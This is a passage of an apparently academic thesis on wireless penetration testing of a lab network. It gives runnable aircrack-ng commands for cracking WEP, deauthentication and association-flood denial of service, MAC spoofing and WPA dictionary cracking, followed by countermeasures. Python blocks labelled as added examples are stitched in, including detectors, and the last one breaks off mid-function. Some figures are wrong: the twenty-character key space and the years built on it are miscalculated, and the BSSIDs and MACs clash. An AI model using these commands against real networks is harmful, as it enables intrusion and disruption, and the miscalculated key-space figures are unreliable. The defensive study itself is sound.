The second scenario had the access point with the WEP encryption method enabled. The purpose of this scenario was to test the WEP cracking tools. As mentioned before, the tools used to crack WEP were the Aircrack-ng suite and WEPCrack. Yet, before proceeding any further it was important to verify that the computer used was able to capture traffic. For this, the wireless card has to be configured with the correct drivers. To test whether the wireless card is configured correctly, the airmon-ng script was used. The airmon-ng script places the interface in monitor mode; if it is not possible to start the interface in monitor mode, there are problems with the drivers of the wireless card. One of the disadvantages of using Backtrack from a live CD is not being able to write to the CD, so every time Backtrack is loaded the pen-tester needs to install the correct drivers. Once the interface is in monitor mode, the penetration tester can start capturing packets.

Although any packet analyzer capable of writing the cap format can be used, the Airodump-ng tool was used because it is included in the Aircrack-ng suite. By default, Airodump-ng hops across all channels; however, there is an option to lock onto a specific channel if desired. The command used to set up Airodump-ng was:

airodump-ng --channel 6 --write test -b 00:16:B6:6C:CD:92 wifi0

• --channel specifies the channel to lock onto. The access point was working on channel 6.

• --write writes the packets to a file; the prefix given here is test, and Airodump-ng names the capture test-01.cap.

• -b is the BSSID of the access point.

• wifi0 is the interface used.


Airodump-ng shows the number of packets and IVs that have been collected, as well as all the stations connected to the access point, as shown in Figure 3.6.

Figure 3.6 Airodump-ng Captures Packets

After using Airodump-ng to determine an allowed MAC address, which in this case was 00:18:E7:1D:EF:CD, it was necessary to change the MAC address: because MAC address filtering is used as a (largely ineffective) security mechanism, penetration testers need to be able to spoof MAC addresses. Backtrack provides a tool to accomplish this, called macchanger. The command line used to change the MAC address:

macchanger -m 00:18:E7:1D:EF:CD wifi0

• -m sets the MAC address manually.

• 00:18:E7:1D:EF:CD is the MAC address of the station that is allowed to connect.

• wifi0 is the interface whose MAC address is going to be changed.


Once the MAC address was successfully changed, the next step was to generate enough packets to crack WEP. Since only one station was connected to the access point, it would have taken too long for that station to generate the packets needed. The tool used to inject packets was Aireplay-ng, which is also included in the Aircrack-ng suite.

Aireplay-ng has different types of attacks that can be used to inject packets. The two most common are the ARP request replay attack and the packet replay attack; these two attacks were used. The first attack needs to capture an ARP packet in order to replay it. The command line used:

aireplay-ng -3 -e testnetwork -b 00:12:17:9E:85:C7 -h 00:18:E7:1D:EF:CD wifi0

• -3 is the ARP replay attack.

• -e is the ESSID of the access point.

• -b is the MAC address of the access point.

• -h is the MAC address of the source wireless interface.

• wifi0 is the interface.

The attack starts reading packets and capturing ARP request packets, as shown in Figure 3.7. It replays these packets back to the access point, and the access point generates a response for each packet received. Each packet generated by the access point has a different IV.


Figure 3.7 Aireplay-ng starting to inject packets

The number of packets started to increase dramatically once the attack was in progress. The number of packets sent by the station with MAC address 00:18:E7:1D:EF:CD increased. The penetration tester can verify this by returning to the Airodump-ng window: the #Data column was rising quickly, and the #/s column showed the rate of injection.

The other way to generate traffic is by injecting normal packets instead of ARP packets. The reason for using this attack is to avoid a wireless intrusion detection system that could be monitoring the wireless network. The command line used:

aireplay-ng -2 -b 00:21:29:CA:BA:62 -d FF:FF:FF:FF:FF:FF wifi0

• -2 is the packet replay attack.

• -b is the MAC address of the access point.

• -d is the destination; the broadcast address reaches all the stations connected to the network.

• wifi0 is the interface.


Figure 3.8 The packet replay attack

As with the ARP replay attack, the number of packets started to increase dramatically. The final step was to open one last window and run Aircrack-ng:

aircrack-ng -b 00:12:17:9E:85:C7 test-01.cap

• -b selects the target AP.

• test-01.cap is the capture file created by Airodump-ng from the name specified with --write.

In Aircrack-ng version 1.0 the default attack used to crack WEP is the PTW attack, which recovers the key faster than previous attacks. Regardless of the method by which WEP is cracked, once found, the key is displayed in hex format (Figure 3.9). In this case the key was found with 9,978 IVs. With the key, the pen-tester can connect to the wireless network and then to the wired network.


Figure 3.9 Aircrack-ng displaying the Key

3.1.2 Cracking WPA-PSK

The third scenario was a wireless network encrypted with the WPA-PSK encryption method. The passphrase used was eight characters long without any special symbols. In this case, the techniques considered were WPA dictionary attacks and brute force attacks. The tools used to crack WPA were coWPAtty and Aircrack-ng 1.0; both are included with the Backtrack Live CD.

The first step was to capture the four-way EAPOL handshake using Airodump-ng, which was already running. In order to capture these four packets, a deauthentication attack was performed using aireplay-ng. The command used:

aireplay-ng -0 1 -a 00:12:17:9E:85:C7 -c 00:18:E7:1D:EF:CD wifi0

• -0 specifies the deauthentication attack.

• 1 is the number of deauthentication packets to send; 0 means continuous.

• -a is the MAC address of the access point.

• -c is the MAC address of the client to deauthenticate; if left blank, all clients are deauthenticated.

• wifi0 is the interface.

A deauthentication attack will probably alert any wireless intrusion detection system (IDS). If the idea is not to be detected, the penetration tester will have to wait until the EAPOL handshake occurs naturally. Upon reauthentication, the four-way handshake is transmitted and captured with Airodump-ng. With the file of the four-way handshake collected with Airodump-ng and the file of the precomputed table for the SSID of the wireless access point, the next step was to start coWPAtty. The command used:

cowpatty -f password.txt -r wpa-01.cap -s testnetwork

• -f is the wordlist.

• -r is the capture file with the four-way handshake.

• -s is the SSID of the access point.

In this case the passphrase was in the dictionary file, so coWPAtty was able to process the capture and find the key in a short period of time. Figure 3.10 shows the search in progress.


Figure 3.10 The process of searching

It is important to mention that, although cracking WPA/WPA2-PSK seems easier than cracking WEP, cracking WPA/WPA2-PSK relies on brute force and dictionary attacks, which are sometimes computationally infeasible. With an appropriate key length, the penetration tester can make these two methods less effective. For example, with an eight-character key using only 62 characters (alphanumeric characters), the total key space, or the dictionary needed for an eight-character password, is in excess of 218 trillion entries, which is far beyond any current storage capabilities. Furthermore, coWPAtty can only try 30-60 words per second; with 218 trillion possibilities it could take years to try all of them.


3.2 Internal pen-test lab

In this lab the goal was to use enumeration tools and address the most common configuration flaws, and furthermore to deploy denial of service (DoS) and man in the middle (MITM) attacks. The layout of this lab is:

Figure 3.11 Network Layout

3.2.1 Enumeration Attacks

The first tool used was Nmap, and the command used was:

nmap -T -sV -v -O 192.168.1.1-254

• -T sets the timing and performance template; higher is faster.

• -sV is the type of scan (service version detection).

• -v increases the verbosity level, causing Nmap to print more information about the scan in progress.

• -O enables OS detection.

Figure 3.11 shows Nmap running.


Figure 3.11 Nmap executing

On the left-hand side of the window, Nmap displays all the devices that belong to the wireless network and were live at the moment of the scan. Table 3.1 summarizes the Nmap results.

Table 3.1 Nmap Results

IP Address | MAC Address | Card Brand | Ports Open | OS
192.168.1.1 | 00:12:17:9E:85:C8 | Cisco-Linksys | 80 | Router
192.168.1.101 | 00:14:22:4A:FC:20 | Dell | 135, 139, 445 | Windows
192.168.1.102 | 00:18:E7:1D:EF:CD | Cameo | 135, 139, 3389 | Windows
192.168.1.106 | 00:14:22:4A:CF:6E | Dell | 135, 139, 445 | Windows
192.168.1.107 | 00:01:03:1C:A3:89 | 3Com | 22, 111, 933 | Linux
192.168.1.108 | 00:01:03:1C:A3:B4 | 3Com | 22, 631 | Linux
192.168.1.109 | 00:01:03:1C:B5:0C | 3Com | 135, 139, 445, 1025 | Windows
192.168.1.111 | 00:01:03:1C:B5:0C | 3Com | None | None


By default, Nmap 4.20 on Backtrack scans 1,697 ports for common services. This will catch most open TCP ports that are out there. However, system administrators sometimes run services on uncommon ports, practicing security through obscurity. Without scanning those uncommon ports, the penetration tester may miss these services. To make Nmap scan all ports, the -p0-65535 option is used; however, this type of scan takes a long time. All this information is used to exploit vulnerabilities in the services or ports. It is out of the scope of this project to exploit vulnerabilities in open ports or services with default configurations.

However, to prevent hackers from exploiting vulnerabilities, there are several tools that allow the system administrator to assess the security of all the stations connected to the network. One of the most common is GFI LANguard Network Security Scanner. This tool checks databases based on OVAL and the SANS Top 20, providing over 15,000 vulnerability assessments when the network is scanned. Also, LANguard gives the penetration tester the information and tools needed to perform multi-platform scans across all environments. The goal is to analyze the network's security health and effectively install and manage patches on all stations across different operating systems [Bayles 2007].


3.2.2 Denial of Service Attacks

As mentioned before, wireless networks are very vulnerable to this type of attack, mainly for two reasons. The first is the lack of frame authentication in 802.11 management frames such as beacons, association requests, and probe responses. The functionality inherent in the MAC layer of an 802.11 network allows wireless systems to discover, join, and roam freely on the network, completely exposed to the elements. This implicit trust among wireless devices makes it easy for an attacker to bring down individual hosts, or even an entire wireless network [Bellardo 2003].

There are many different types of denial of service (DoS) attacks, which can impact radio signals, network protocols, and even wireless applications. The attacks performed in this project were the deauthentication and the authentication attacks. A deauthentication attack puts the client in a state of complete disconnection. The tool used was Aireplay-ng. The command line used:

aireplay-ng -0 1 00:12:17:9E:85:C7 wifi0

• -0 specifies the deauthentication attack.

• The number after -0 is the number of deauthentication packets to send; 0 means continuous.

• -a is the MAC address of the access point.

• -c is the MAC address of the client to deauthenticate; if left blank, all clients are deauthenticated.

• wifi0 is the interface.


All the stations connected to the access point were deauthenticated, and because aireplay-ng continued to send deauthentication packets, no one was able to reconnect to the access point. The second attack exploits a weakness in the way access points queue incoming client requests. These requests are stored in the client association identifier (AID) table. The AID table can only handle a limited number of wireless client connections; once this memory is filled, most APs will no longer accept incoming association requests. One of the most common tools to create an association flooding attack is Void11. The command used was:

void11_penetration wifi0 -D -s 3 -s -S testnetwork -B 00:12:17:9E:85:C7

• wifi0 is the interface.

• -s is the association flood attack.

• -S is the SSID of the access point.

• -B is the BSSID of the access point.

This attack overloaded the AID table within seconds, making the AP freeze.


4. EVALUATION AND RESULTS

Once the penetration testing has finished, the next step is to report the findings to all those with an interest, such as the network administrator and management. The reporting phase is as important as the testing itself. Writing a good report requires a great deal of effort; sometimes it can take three times as long as the work itself. The report shows the completeness and rigor of the pen-tester's testing methodology. The report should include the following sections [Bayles 2007]:

• Executive Summary

• In-Scope and Out-of-Scope Statements

• Objectives

• Nature of Testing

• Analysis

• Summary of Findings and Vulnerability Summary

• Countermeasure(s) to Control the Vulnerability

• Conclusion

• Supporting Documentation

Many organizations make the major mistake of not following up swiftly. It is one thing to identify vulnerabilities; it is another thing altogether to fix the problem. Companies are in a worse legal position if they do not fix known problems than if they do not know about the problems. Furthermore, if companies delay the follow-up, they also risk wasting the money and time spent on the test itself [Bayles 2007].


4.1 External pen-test lab

4.1.1 First Scenario

The first vulnerability found was the rogue access point (AP) discovered with no security. The access point was connected to the main wired network, creating a back door for any malicious hacker. Furthermore, the AP made all the other security measures useless. Most of the time there exists a policy or rule that prohibits connecting any device without the consent of the security manager; however, it is not only a matter of establishing a policy, there have to be controls to ensure that the policy is being followed by all the employees. Also, security is not only a matter for the security manager; it involves all the employees in the company. It has been reported that the majority of successful attacks were due to the human factor. The countermeasures to avoid and eliminate this vulnerability are [Bayles 2007]:

• Using active and passive scanner tools to identify possible illegal access points.

• Keeping employees informed about the security issues of new technology.

As demonstrated, hiding the SSID of the access point is not an effective security measure. Using tools such as Kismet and Airodump-ng, the malicious hacker can easily find the access point.

4.1.2 Second Scenario

In the second scenario the vulnerability found was the use of the WEP encryption method, which was easily broken. Table 4.1 shows the amount of time and number of packets needed to crack both 64-bit and 128-bit WEP.


Table 4.1 Cracking WEP

WEP key (bits) | Number of Packets | Time to Decrypt (sec)
64 | 15,000 | 5
128 | 70,000 | 10

Having tools to inject packets into a wireless network makes the process of cracking WEP even easier for malicious hackers. They do not need to wait until associated users generate the number of packets needed to crack WEP; they can generate traffic and crack the encryption within seconds. The countermeasures to this vulnerability are [Bayles 2007]:

• Not using the WEP encryption method anymore; there are other, more secure methods.

• Using a Wireless Intrusion Detection System (WIDS) to monitor the air space and detect whenever a malicious hacker is injecting packets.

Wireless intrusion detection systems in their simplest form are designed and built to monitor and report on network activities, or packets, between communicating devices. The most common WIDS are AirMagnet Distributed 4.0, AirDefense Enterprise V4.1 and the Red-M set of products. AirMagnet sensors report network performance information and alerts to a management server with a SQL database, which is monitored through a management console. One of the most important features is the ability to identify and give aliases to various wireless MACs, thus making it easier to tell actual users from illegal users. By using the Find tool the security manager can manually and physically track down the location of the rogue user. Furthermore, AirMagnet will even pick up DoS attacks as they happen. Administrators can disable a site and re-address it, and if the attacker is nearby, potentially track him down [Broadcom 2006].


The AirDefense system consists of a server running Linux with distributed wireless AP sensors and a Java-based web console. AirDefense's strong suit is its policy-based approach to monitoring wireless devices and traffic. There are four main categories of policies: configuration, performance, vendor, and channel. All of the policy thresholds are configurable. For instance, if the company allows only Cisco NICs, then all other NICs could be excluded, so that a non-Cisco NIC would immediately trip an alarm [Broadcom 2006].
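As an added example (not code from the thesis, NetStumbler, Kismet or AirDefense), the Python below cross-checks scanner observations against an authorized AP inventory and a vendor policy of the kind just described, flagging the rogue, hidden-SSID and unencrypted cases from the first scenario; the inventory, the two APs other than the rogue one from Figure 3.2, and the allowed-vendor set are assumptions, and the OUI table holds only the vendors the thesis itself reports.

```python
"""Rogue access point audit: scanner observations versus an authorized inventory.

Added example, not code from the thesis. The vendor prefixes below are only the
ones the thesis reports (Figure 3.2 and Table 3.1), not a full OUI database.
"""

OUI_VENDORS = {"00:0F:66": "Linksys", "00:12:17": "Cisco-Linksys",
               "00:14:22": "Dell", "00:01:03": "3Com", "00:18:E7": "Cameo"}

WEAK_ENCRYPTION = ("none", "WEP")


def vendor_of(mac: str) -> str:
    """Map a MAC address to a vendor by its 3-byte OUI prefix."""
    return OUI_VENDORS.get(mac.upper()[:8], "unknown")


def audit(observations, inventory, allowed_vendors):
    """Return (bssid, finding) tuples; one observed AP can raise several findings.

    observations: dicts with bssid, ssid ("" when hidden), channel, encryption.
    inventory:    authorized APs keyed by BSSID with their expected SSID.
    """
    findings = []
    for obs in observations:
        bssid = obs["bssid"].upper()
        expected = inventory.get(bssid)
        if expected is None:
            findings.append((bssid, "rogue: BSSID not in the authorized AP inventory"))
        elif obs["ssid"] and obs["ssid"] != expected["ssid"]:
            findings.append((bssid, f"ssid mismatch: inventory expects {expected['ssid']!r}"))
        if not obs["ssid"]:
            # A hidden SSID is not a control: a scanner still lists the AP by BSSID.
            findings.append((bssid, "hidden SSID: AP is not broadcasting its name"))
        if obs["encryption"] in WEAK_ENCRYPTION:
            findings.append((bssid, f"weak link security: {obs['encryption']}"))
        vendor = vendor_of(bssid)
        if vendor not in allowed_vendors:
            findings.append((bssid, f"vendor policy: {vendor} hardware is not allowed"))
    return findings


def run_demo():
    """Constructed scan: the rogue AP from Figure 3.2 plus two assumed APs."""
    lab_ap = "00:12:17:9E:85:C7"                      # lab AP BSSID from the thesis
    inventory = {lab_ap: {"ssid": "corpnet"}}         # assumed authorized inventory
    observations = [
        # The unauthorized Linksys AP NetStumbler found (Figure 3.2).
        {"bssid": "00:0F:66:DF:87:45", "ssid": "testnetwork", "channel": 6, "encryption": "none"},
        # The authorized AP, correctly configured (assumed).
        {"bssid": lab_ap, "ssid": "corpnet", "channel": 1, "encryption": "WPA"},
        # An assumed hidden-SSID AP on unknown hardware, still running WEP.
        {"bssid": "02:00:00:00:00:01", "ssid": "", "channel": 11, "encryption": "WEP"},
    ]
    return audit(observations, inventory, allowed_vendors={"Cisco-Linksys"})


if __name__ == "__main__":
    for bssid, finding in run_demo():
        print(f"{bssid}  {finding}")
```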

The Red-M set of wireless security products includes Red-Alert and Red-Vision. Red-Alert is a standalone wireless probe which can detect unauthorized 802.11a/b/g networks. Red-Vision has three components. The Red-Vision server is the heart of Red-Vision and contains both the intra-process communications engine and the internal standards-compliant database. The Red-Vision Laptop Client is the agent installed on every laptop computer connected to the wireless network; it collects data from the end user and also monitors the hardware in use. The Red-Vision Viewer is a geographic-based interface, which is unique, since no other wireless software product offers the wireless network administrator this much control. Also, the Red-Vision Viewer provides control over every separate device/appliance/hardware type that connects to the network, no matter how many different pieces of equipment make up the wireless environment [Broadcom 2006].


4.1.3 Third Scenario

In the third scenario the vulnerability found was the use of an eight-character passphrase to generate the WPA/WPA2 key. It was possible to crack the WPA/WPA2 encryption method because the passphrase was too short. For instance, with a passphrase twenty characters long where the characters are alphanumeric values only (62 characters), a brute force attack would have to try 104,857,600,000,000,000,000,000,000 combinations. If coWPAtty can only try 60 words per second, it will take 55,416,878,065,279,891 years to try all possible words. WPA/WPA2-PSK is a good choice for SOHO environments. As shown, it is computationally infeasible to crack this encryption method when using long passphrases. For enterprises the best option is WPA-RADIUS, which has not been cracked yet.
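The following Python, added here and not taken from the thesis, coWPAtty or Aircrack-ng, works the key-space estimate of sections 3.1.2 and 4.1.3 for any passphrase length and derives the WPA/WPA2-PSK pairwise master key with the PBKDF2-HMAC-SHA1 mapping specified by IEEE 802.11i, which is why a precomputed table is tied to one SSID; the 60 guesses/s rate is the figure the text reports, and the sample SSIDs and passphrases are assumed.

```python
"""WPA/WPA2-PSK key derivation and passphrase key-space arithmetic.

Added example for the WPA-PSK sections; not code from the thesis, coWPAtty or
Aircrack-ng. PMK derivation is the PBKDF2-HMAC-SHA1 mapping of IEEE 802.11i;
60 guesses/s is the upper end of the coWPAtty rate the thesis reports.
"""
import hashlib
import time

ALPHANUMERIC = 26 + 26 + 10          # the 62-character alphabet used in the thesis
SECONDS_PER_YEAR = 365 * 24 * 3600


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits).

    The SSID is the salt, which is why a precomputed table applies to a single
    SSID, and the 4096 iterations are what makes each dictionary guess slow.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct passphrases of exactly `length` characters."""
    return alphabet_size ** length


def exhaustive_search_years(space: int, guesses_per_second: float) -> float:
    """Worst-case time to try every passphrase at a fixed guess rate."""
    return space / guesses_per_second / SECONDS_PER_YEAR


def estimate(length: int, alphabet_size: int = ALPHANUMERIC,
             guesses_per_second: float = 60.0) -> dict:
    """Key space and search time for a passphrase policy; this generalizes the
    eight-character case worked in the text to any length and alphabet."""
    space = keyspace(alphabet_size, length)
    worst = exhaustive_search_years(space, guesses_per_second)
    return {"length": length, "keyspace": space,
            "worst_case_years": worst, "expected_years": worst / 2}


def derivations_per_second(samples: int = 50) -> float:
    """Measure how many PMK derivations this machine manages per second."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate{i:04d}", "testnetwork")   # constructed candidates
    return samples / max(time.perf_counter() - start, 1e-9)


if __name__ == "__main__":
    print(derive_pmk("password", "IEEE").hex())   # IEEE 802.11i annex test vector
    for length in (8, 20):
        e = estimate(length)
        print(f"{length:2d} chars: {e['keyspace']:.3e} keys, "
              f"{e['worst_case_years']:.3e} years at 60 guesses/s")
    print(f"{derivations_per_second():.0f} PBKDF2 derivations/s on this machine")
```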

4.2 Internal Pen-Test lab

4.2.1 Vulnerability Assessment

In order to detect and eliminate possible vulnerabilities there exist tools such as Nessus. Nessus is proprietary, comprehensive vulnerability scanning software. Its goal is to detect potential vulnerabilities on the tested system. For example:

• Vulnerabilities that allow a remote attacker to control or access sensitive data on a system.

• Misconfigurations such as an open mail relay or missing patches.

• Default passwords, and blank/absent passwords on system accounts.


Although the stations used in this lab did not have many services or ports open, because none of them were servers, one of the most important rules for hardening a host system is the concept of minimization: only essential applications and operating system components should be loaded on host systems. Software vulnerabilities account for a large percentage of the security incidents that occur; thus, less software on a host generally equates to less exploitation of software vulnerabilities. Another common rule is the isolation of services. It is best to isolate services such as email, WWW, and FTP on separate physical systems. This way, if a service is exploited by an intruder, the potential impact on the critical services would be limited [CERT 2003].

4.2.2 Denial of Service Attacks

There are several procedures that a security manager can follow to protect his systems from DoS attacks. Many of these are free and relatively simple. It is important to determine what is normal in the wireless network, for example [Beaver 2005]:

• Protocols in use

• Minimum, maximum, and average number of connections

• Minimum, maximum, and average throughput

• RF signal strength

• Any notable RF interference

• Number of users

This information is invaluable when a security manager is trying to determine whether a denial of service attack is about to occur, is occurring, or has already occurred.


Another tool to prevent or detect DoS attacks is a wireless intrusion detection system (WIDS). A WIDS looks for [Beaver 2005]:

• Unauthorized MAC addresses

• Unauthorized broadcast traffic

• Jamming

• Association floods

• Authentication floods

• Disassociation attacks

• Deauthentication attacks
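As an added example (not code from the thesis or from any WIDS product it names), the Python below parses raw 802.11 management-frame headers and applies sliding-window thresholds to flag the deauthentication and association floods of sections 3.2.2 and 4.2.2; the frames are constructed inline, and the window length and thresholds are assumptions.

```python
"""Management-frame flood detector: deauthentication and association floods.

Added example for the DoS sections; not code from the thesis or from any WIDS
product it names. Frames are built inline (no radio), and the window length
and the thresholds are assumptions chosen for illustration.
"""
from collections import defaultdict, deque

# Subtypes of type-0 (management) frames, taken from the 802.11 frame-control byte.
MGMT_SUBTYPES = {0x0: "assoc-request", 0x8: "beacon", 0xA: "disassoc",
                 0xB: "auth", 0xC: "deauth"}
BROADCAST = "FF:FF:FF:FF:FF:FF"


def _mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def build_mgmt_frame(subtype: int, addr1: str, addr2: str, addr3: str) -> bytes:
    """Minimal 24-byte 802.11 management header (no body, no FCS)."""
    macs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (addr1, addr2, addr3))
    frame_control = bytes([subtype << 4, 0x00])   # version 0, type 0, given subtype
    return frame_control + b"\x00\x00" + macs + b"\x00\x00"   # duration, addrs, seq ctrl


def parse_mgmt_header(frame: bytes):
    """Return (subtype, addr1, addr2, addr3) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:          # bits 2-3 hold the frame type; 0 is management
        return None
    subtype = MGMT_SUBTYPES.get(fc0 >> 4, f"mgmt-{fc0 >> 4}")
    return subtype, _mac_str(frame[4:10]), _mac_str(frame[10:16]), _mac_str(frame[16:22])


class FloodDetector:
    """Sliding-window counters per BSSID (addr3 of a management frame).

    Deauth/disassoc floods are counted in frames; association/authentication
    floods in distinct source stations, since that is what fills an AP's AID table.
    """

    def __init__(self, window_s=5.0, deauth_limit=10, assoc_limit=20):
        self.window_s = window_s
        self.deauth_limit = deauth_limit
        self.assoc_limit = assoc_limit
        self.deauth = defaultdict(deque)    # bssid -> deque of (timestamp, source MAC)
        self.assoc = defaultdict(deque)
        self.alerts = []

    def _expire(self, dq, now):
        while dq and now - dq[0][0] > self.window_s:
            dq.popleft()

    def _alert(self, ts, bssid, message):
        alert = {"time": ts, "bssid": bssid, "message": message}
        self.alerts.append(alert)
        return alert

    def observe(self, ts: float, frame: bytes):
        """Feed one captured frame with its timestamp; returns an alert dict or None."""
        parsed = parse_mgmt_header(frame)
        if parsed is None:
            return None
        subtype, dst, src, bssid = parsed
        if subtype in ("deauth", "disassoc"):
            dq = self.deauth[bssid]
            dq.append((ts, src))
            self._expire(dq, ts)
            if len(dq) == self.deauth_limit:     # alert once, as the threshold is crossed
                return self._alert(ts, bssid, f"{subtype} flood: {len(dq)} frames within "
                                   f"{self.window_s}s (destination {dst})")
        elif subtype in ("assoc-request", "auth"):
            dq = self.assoc[bssid]
            dq.append((ts, src))
            self._expire(dq, ts)
            distinct = len({s for _, s in dq})
            if distinct == self.assoc_limit:
                return self._alert(ts, bssid, f"{subtype} flood: {distinct} distinct "
                                   f"stations within {self.window_s}s")
        return None


def run_demo():
    """Replay a constructed capture: beacons, a broadcast deauth burst, an association flood."""
    lab_ap = "00:12:17:9E:85:C7"                 # lab AP BSSID used in the thesis
    det = FloodDetector(window_s=5.0, deauth_limit=10, assoc_limit=20)
    for i in range(20):                          # ordinary beacons must not alert
        det.observe(i * 0.1, build_mgmt_frame(0x8, BROADCAST, lab_ap, lab_ap))
    for i in range(12):                          # deauth to broadcast with the AP as source
        det.observe(10 + i * 0.05, build_mgmt_frame(0xC, BROADCAST, lab_ap, lab_ap))
    for i in range(25):                          # 25 constructed stations associating at once
        station = f"02:00:00:00:00:{i:02X}"
        det.observe(20 + i * 0.02, build_mgmt_frame(0x0, lab_ap, station, lab_ap))
    return det.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(f"t={alert['time']:.2f}s  {alert['bssid']}  {alert['message']}")
```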


5. FUTURE WORK

Security threats are an ever-increasing problem for modern computing infrastructures. Attempts to characterize the security of a large networked system are the focus of several ongoing research efforts. One approach is to perform penetration testing of an actual system manually, by red teams. Such an approach generates only one of what may be many attack paths through a system [Broadcom 2006]. Current security practice focuses only on specifics, such as firewall testing, web server testing, etc. The other approach is to create a formal model of the system and then obtain comprehensive security metrics by analyzing the model. The most common methodology used by pen-testers is the Open Source Security Testing Methodology Manual (OSSTMM) 2.1 created by Pete Herzog. However, this methodology does not encompass all the security issues related to wireless networks, since it is intended as a guide for wired networks [Beaver 2005]. Thus, research in this field is required to produce a generic model that can be used as a basic guideline when doing wireless penetration testing.

Another field of research is the one related to wireless intrusion detection systems, which are a countermeasure to all the security flaws in wireless networks explained above. To be effective, a WIDS must run online, in real time: although offline, after-the-event IDSs are useful for an audit trail, this type of IDS will not prevent an attack from taking place. A real-time IDS needs to be able to stream data across a network from sensors to a central point where it can be stored and analyzed. This additional network traffic running concurrently can significantly impact network performance, so sufficient bandwidth is a prerequisite [Broadcom 2006].


Furthermore, today's wireless intrusion detection systems, such as AirDefense Guard or AirMagnet Distributed, use a misuse (signature-based) IDS, which has the drawback of only being as good as the signature files and known-attack-pattern recognition files given to them. The problem is that a wireless network using this security tool has protection only against what are known to be attacks; a new attack will be the one that gets the wireless network. This underlines the need for an efficient mechanism for keeping all network security components with rule- or signature-based tables up to date [Broadcom 2006].

Another field of research is the use of neural networks in wireless intrusion detection systems, since a neural network is the solution to the problem of determining what normal traffic is. A neural network is a mathematical model based on biological neural networks. Neural networks can be used to model complex relationships between inputs and outputs or to find patterns in data. One of the biggest advantages of neural networks is the possibility of learning.


6. CONCLUSION

With the emergence of network globalization and the advent of the Internet as the major tool for international information exchange and the platform for the future, security has always been one of the most talked about topics. It is clear that wireless solutions are transforming the way people work and live. Using wireless-enabled devices, it is already possible to access the Internet from public areas such as coffee shops, hotels and motorway rest stops. All of this is possible through the use of Wireless Local Area Networks (WLANs). Large businesses are starting to wake up to the productivity benefits and cost advantages of WLANs. Furthermore, the development of affordable products and services has allowed small to medium businesses to invest in the deployment of WLANs.

As with all networks, wired or wireless, the security threats are numerous, but with WLANs the security manager has to look at these security threats in a different way. The physical medium over which wireless networks transport data is like having network cables running outside the perimeter of the building. The bottom line is that wireless networking, as a new technology, needs new security controls to secure it. Wireless penetration testing is a new methodology to address the security of 802.11 wireless LAN networks.


Wireless penetration testing has been determined to be the most effective way to find exploits and to prove whether a system is vulnerable. Also, it often allows the security analyst to find new vulnerabilities. Penetration testing should play a role in every company's network security policy. It gives a bird's-eye perspective on current security. It also helps to identify what information is exposed to the public or the Internet world. By making up attack scenarios that closely model all possible situations, wireless penetration testing helps to identify and narrow down security risks. Furthermore, it also helps to identify overlooked areas of security and allows customers to improve their current systems.

The results of the wireless penetration tests have demonstrated that one of the major security flaws in wireless networks is the use of the Wired Equivalent Privacy (WEP) encryption method. It has been proven that this encryption method is easily cracked with tools such as Aircrack-ng and WEPCrack. It is only a matter of gathering a few thousand packets, and these tools will crack the WEP key within seconds. Also, if there is not much traffic being generated, there are tools such as Aireplay-ng and Packetforge-ng that can generate and inject packets so that the access point produces the number of IVs necessary to crack the WEP key.

Even worse is that there are still many access points with no encryption method in place. Also, hiding the SSID cannot be considered a security measure, because there are tools that can gather information about the access point even when it is not broadcasting its SSID. Furthermore, MAC address filtering is not a security measure either, since, as already shown, tools such as Airodump-ng, Kismet and Wireshark can easily obtain the MAC addresses of authorized users.


A solution for SOHO users to the encryption problem is the use of WPA with a passphrase of twenty characters or longer. The passphrase should include special characters and upper-case characters, and it should not consist of typical words that can be found in a dictionary. A solution for large enterprises is the use of WPA-RADIUS. This technology has been proven to be secure, and so far no exploit has been found.
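The passphrase policy above, checked in code as an added example (this is not code from the thesis): it tests the stated rules, at least twenty characters, an upper-case character, a special character and no typical dictionary words, against a small word list constructed for the example that stands in for a real dictionary or leaked-password list. It also checks the 8-to-63-character limit that WPA pre-shared-key passphrases must satisfy, since a longer passphrase is rejected by the access point rather than made stronger.

```python
"""Check a WPA pre-shared key against the passphrase policy stated above.

Added example, not part of the thesis. SAMPLE_DICTIONARY is a constructed
stand-in for a real dictionary; a production check would load a full word
list or a leaked-password list instead.
"""
import re
from dataclasses import dataclass, field
from typing import List, Set

MIN_LENGTH = 20          # recommended minimum from the text
WPA_PSK_MIN, WPA_PSK_MAX = 8, 63   # limits for an ASCII WPA-PSK passphrase

# Constructed sample of "typical words" standing in for a real dictionary.
SAMPLE_DICTIONARY: Set[str] = {
    "password", "wireless", "network", "admin", "welcome", "summer",
    "internet", "company", "secret", "access", "point", "router",
}

# Common symbol-for-letter substitutions, reversed so that "p@ssw0rd" is
# still recognised as the dictionary word "password".
LEET_MAP = str.maketrans({"@": "a", "0": "o", "1": "i", "3": "e",
                          "$": "s", "5": "s", "4": "a", "7": "t"})


@dataclass
class PolicyResult:
    ok: bool
    problems: List[str] = field(default_factory=list)


def _dictionary_words(passphrase: str, dictionary: Set[str]) -> List[str]:
    """Return dictionary words that appear as alphabetic runs in the passphrase."""
    normalised = passphrase.lower().translate(LEET_MAP)
    runs = re.findall(r"[a-z]+", normalised)
    return [w for w in runs if w in dictionary]


def check_wpa_passphrase(passphrase: str,
                         dictionary: Set[str] = SAMPLE_DICTIONARY) -> PolicyResult:
    """Apply the policy; ok is True only when no rule is violated."""
    problems: List[str] = []
    if not (WPA_PSK_MIN <= len(passphrase) <= WPA_PSK_MAX):
        problems.append(f"WPA passphrases must be {WPA_PSK_MIN} to {WPA_PSK_MAX} characters")
    if len(passphrase) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.isupper() for c in passphrase):
        problems.append("no upper-case character")
    # "special" here means any printable character that is not a letter,
    # digit or whitespace
    if not any(not c.isalnum() and not c.isspace() for c in passphrase):
        problems.append("no special character")
    words = _dictionary_words(passphrase, dictionary)
    if words:
        problems.append("contains dictionary words: " + ", ".join(words))
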